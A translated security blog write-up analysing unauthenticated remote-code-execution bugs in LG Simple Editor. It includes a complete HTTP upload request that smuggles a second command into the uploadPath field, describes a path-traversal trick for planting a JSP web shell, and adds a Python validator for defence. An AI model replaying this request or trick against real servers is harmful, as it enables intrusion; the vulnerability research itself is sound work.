Several RCE vulnerabilities in LG Simple Editor
source link: https://y4er.com/posts/lg-simple-editor-rce/
LG is a company that specialises in LED displays and has a number of products under its name. This time I looked at LG Simple Editor, which ZDI disclosed bugs in. There are not many instances on the public internet, but the vulnerabilities are unauthenticated RCE.
https://www.zerodayinitiative.com/advisories/ZDI-23-1208/
com.lge.simpleeditor.content.controller.ImageManagerRestController#uploadVideo
The vulnerability is very simple.

com.lge.simpleeditor.content.service.CanvasServiceImpl#readVideoInfo builds the command by string concatenation.

The final cmd string, built from filePath, is:

```
MediaInfo --Inform=General;%Duration% -f "C:/LG Simple Editor/server/webapps/simpleeditor/sessions/1.mp4" > "C:/LG Simple Editor/server/webapps/simpleeditor/sessions/1.mp4.ini"
```

The path is wrapped in double quotes and the whole thing is started with cmd /c.
So all that is needed is to escape the double quotes from inside the cmd variable.

Closing the double quote directly produced an error. Then I remembered that Windows does not allow special characters in folder or file names, so I changed it to `\"/../`: close the double quote this way, then use `../` to step up a directory, and the error no longer appears.
The constructed request is as follows:

```http
POST /simpleeditor/imageManager/uploadVideo.do HTTP/1.1
Host: 172.16.1.179:8080
Content-Length: 770
Accept: */*
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryyb6VMLBDGWBAjiJA
Origin: http://172.16.1.179:8080
Referer: http://172.16.1.179:8080/simpleeditor/index.do
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,ga;q=0.6
Connection: close

------WebKitFormBoundaryyb6VMLBDGWBAjiJA
Content-Disposition: form-data; name="uploadFile"; filename="1.mp4"
Content-Type: video/mp4

1
------WebKitFormBoundaryyb6VMLBDGWBAjiJA
Content-Disposition: form-data; name="uploadPath"

/sessions\"&ping localhost -nc 1&\..\..\..\
------WebKitFormBoundaryyb6VMLBDGWBAjiJA
Content-Disposition: form-data; name="uploadFile_x"

-1000
------WebKitFormBoundaryyb6VMLBDGWBAjiJA
Content-Disposition: form-data; name="uploadFile_y"

-1000
------WebKitFormBoundaryyb6VMLBDGWBAjiJA
Content-Disposition: form-data; name="uploadFile_width"

1064
------WebKitFormBoundaryyb6VMLBDGWBAjiJA
Content-Disposition: form-data; name="uploadFile_height"

599
------WebKitFormBoundaryyb6VMLBDGWBAjiJA--
```

The injected command is as follows:
# Another RCE

Looking more carefully at the feature set, I found an arbitrary file upload that allows directory traversal.
The file path is determined by originalFilePath at label 1, which in turn depends on the uploadPath and fileName variables at label 2. uploadPath is taken from the HTTP request at label 4 and allows directory traversal, while at label 3 the extension is only checked if the file name contains a `.`. So uploadPath can be set to `/js/1.` and fileName to just `jsp`, which concatenates into an originalFilePath of `/js/1.jsp`.

That is enough to write a JSP shell.

The shell path is at
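Both bugs above come from validating the two halves of a path separately and then handing the concatenated result to the filesystem and to cmd /c. As an added example (not the project's code, and independent of the original post), the check below validates the string the application actually builds (uploadPath + fileName, as described above), confines it to the upload root, and checks the extension of the resolved path rather than of fileName alone; the upload root and extension allowlist are assumptions.

```python
import ntpath

# Assumed upload root, mirroring the deployment path quoted in the post.
UPLOAD_ROOT = r"C:\LG Simple Editor\server\webapps\simpleeditor"
ALLOWED_EXT = {".mp4", ".jpg", ".png"}  # assumed allowlist for this endpoint
# Characters that close a quoted argument or act as cmd.exe operators.
BAD_CHARS = set('"\'`&|;<>^%\r\n\x00')


def check_upload(upload_path: str, file_name: str) -> tuple:
    """Return (True, resolved_path) or (False, reason).

    The inputs are concatenated exactly as the post says the application
    does, so every check runs on the value that reaches the filesystem
    and the MediaInfo command line, not on the two halves in isolation.
    """
    raw = upload_path + file_name
    if any(c in BAD_CHARS for c in raw):
        return False, "forbidden character in path"
    root = ntpath.normpath(UPLOAD_ROOT)
    # Strip leading separators so ntpath.join cannot treat the input as rooted.
    rel = raw.lstrip("/\\")
    resolved = ntpath.normpath(ntpath.join(root, rel))
    # Confinement: after '..' collapsing, the path must stay below the root.
    if not resolved.startswith(root + ntpath.sep):
        return False, "path escapes upload root"
    # Extension check on the *resolved* path defeats the '/js/1.' + 'jsp' trick.
    ext = ntpath.splitext(resolved)[1].lower()
    if ext not in ALLOWED_EXT:
        return False, f"extension {ext!r} not allowed"
    return True, resolved


def mediainfo_argv(video_path: str) -> list:
    """Argument vector for MediaInfo with no shell involved.

    Passing a list to subprocess.run (or ProcessBuilder in Java) makes a
    quote inside the path plain data, not command syntax. The .ini file the
    post shows being produced with '>' is then written by the caller from
    the captured stdout instead of by cmd.exe redirection.
    """
    return ["MediaInfo", "--Inform=General;%Duration%", "-f", video_path]
```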
ZDI published a whole batch of bugs for this product; I looked through them and they are all simple, not worth writing up.

My writing is poor, my wording flippant, the content shallow and my technique rusty. Corrections and pointers from the masters are welcome and much appreciated.